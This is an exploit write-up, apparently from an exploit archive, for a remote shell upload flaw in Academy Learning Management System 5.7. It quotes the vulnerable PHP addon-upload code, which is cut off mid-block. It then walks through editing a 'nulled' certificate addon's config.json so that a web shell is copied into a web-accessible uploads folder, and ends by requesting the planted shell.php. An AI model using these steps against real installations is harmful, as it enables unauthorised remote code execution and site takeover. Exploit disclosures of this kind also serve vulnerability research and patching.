Academy Learning Management System 5.7 Shell Upload

Academy Learning Management System version 5.7 suffers from a remote shell upload vulnerability.

SHA-256 | 8f5ea1ed03e514169afbef198fca84d3a923d2ba76402fc2c21d5c8fce52443a

# Exploit Title: Academy Learning Management System 5.7 Shell Upload
# Exploit Author: th3d1gger
# Vendor Homepage:
# Software Link:
# Version: 5.7
# Tested on Ubuntu 18.04

Totally wrong architecture for uploading zip files on install addon

---Vulnerable Source Code ---
$zipped_file_name = $_FILES['addon_zip']['name'];

if (!empty($zipped_file_name)) {
// Create update directory.
$dir = 'uploads/addons';
if (!is_dir($dir))
mkdir($dir, 0777, true);

$path = "uploads/addons/".$zipped_file_name;
if (class_exists('ZipArchive')) {
move_uploaded_file($_FILES['addon_zip']['tmp_name'], $path);
//Unzip uploaded update file and remove zip file.
$zip = new ZipArchive;
$this->session->set_flashdata('error_message', get_phrase('your_server_is_unable_to_extract_the_zip_file').'. '.get_phrase('please_enable_the_zip_extension_on_your_server').', '.get_phrase('then_try_again'));
redirect(site_url('admin/addon'), 'refresh');

get request route "/admin/addon/add" at admin panel.

And then for example download "certificate addon" nulled version.

in addons config.json file
"root_directory" : "uploads/addons/certificate/others/shell.php",
"update_directory" : "uploads/certificates/shell.php"

add your webshell to others folder in addon.

click install addon button.

And ta daa !
->get request https://your-url/uploads/certificates/shell.php

Related Posts